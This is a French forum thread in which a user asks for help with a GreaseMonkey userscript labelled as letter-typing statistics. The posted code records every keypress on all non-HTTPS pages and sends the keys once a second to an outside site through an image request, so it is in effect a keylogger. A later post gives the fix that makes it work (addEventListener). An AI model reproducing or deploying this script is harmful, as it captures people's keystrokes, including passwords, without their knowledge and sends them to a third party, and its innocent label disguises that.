Javascript dans GreaseMonkey pour Firefox

Vous vous penchez sur le développement d'applications ou d'extensions pour Mozilla ? C'est alors vers ce forum que se dirigeront naturellement vos requêtes...
paulair
Arias
Messages : 3
Inscription : 11 juil. 2011, 10:32

Javascript dans GreaseMonkey pour Firefox

Message par paulair »

Bonjour à tous,

Nouveau sur le forum, j'ai un petit problème concernant un script executé via GreaseMonkey. Le forum de GreaseMonley (userscripts.org) n'étant pas très actif, je viens à vous. Mes connaissances en Javascript ne sont pas extraordinaire, je suis en plein apprentissage de ce langage.
Bon voilà mon problème. J'ai mon script, relativement simple : (key.user.js) (aidé d'internet pour le moment)

Code : Tout sélectionner

// ==UserScript==
// @name KeyAnalysis
// @namespace Paulair
// @description Statistics on letters you type.
// @version 1.0
// @include *
// @exclude https://*
// ==/UserScript==
var keys='';
document.onkeypress = function(e) {
get = window.event?event:e;
key = get.keyCode?get.keyCode:get.charCode;
key = String.fromCharCode(key);
keys+=key;
};
window.setInterval(function(){
new Image().src = 'monsite.com'+keys; /*cette page analyse ensuite les lettres tapées, de ce coté il n'y a pas de problème*/
keys = '';
}, 1000);
Dans la console web (Ctrl+Shift+K sur FF), mon script fonctionne très bien. Mais une fois installé dans Greasemonkey, il ne fait plus rien ! Pour tester, j'ai inséré une fonction bateau : setInterval("alert('Hello')",2000). Lorsque je l'insère en début de mon script, elle fonctionne. Et si je l'insère avant window.setInterval ou à la fin, elle ne fonctionne pas. Le script ne serait donc pas lu en entier. Quelqu'un saurait-il pourquoi ? Y a-t-il des particularités à GreaseMonkey ?

Merci d'avance,

Paulair.
Dernière modification par paulair le 25 déc. 2011, 18:15, modifié 1 fois.
paulair
Arias
Messages : 3
Inscription : 11 juil. 2011, 10:32

[Résolu] Javascript dans GreaseMonkey pour Firefox

Message par paulair »

Problème résolu en changeant onkeypress par addEventListener (car onkeypress n'est pas reconnu par GreaseMonkey apparement..!)
paulair
Arias
Messages : 3
Inscription : 11 juil. 2011, 10:32

Re: Javascript dans GreaseMonkey pour Firefox

Message par paulair »

Bonjour,

Mon message s'adresse à un modo :)
Y aurait-il moyen d'enlever l'adresse de mon site qui figure dans le code que j'avais tapé dans mon post précédent svp ? (à l'endroit : new Image().src = ' '). Car cette page du forum arrive dans les résultats de google en tapant l'adresse de mon site, et j'aimerai éviter cela.. et je ne vois pas comment éditer mon ancien post.
Merci et désolé du dérangement !

Joyeux Noël !

Paulair.

Edit : C'est bon, le bouton est apparu au refresh après identification ! Mea culpa :)
Répondre

Qui est en ligne ?

Utilisateurs parcourant ce forum : Aucun utilisateur inscrit et 2 invités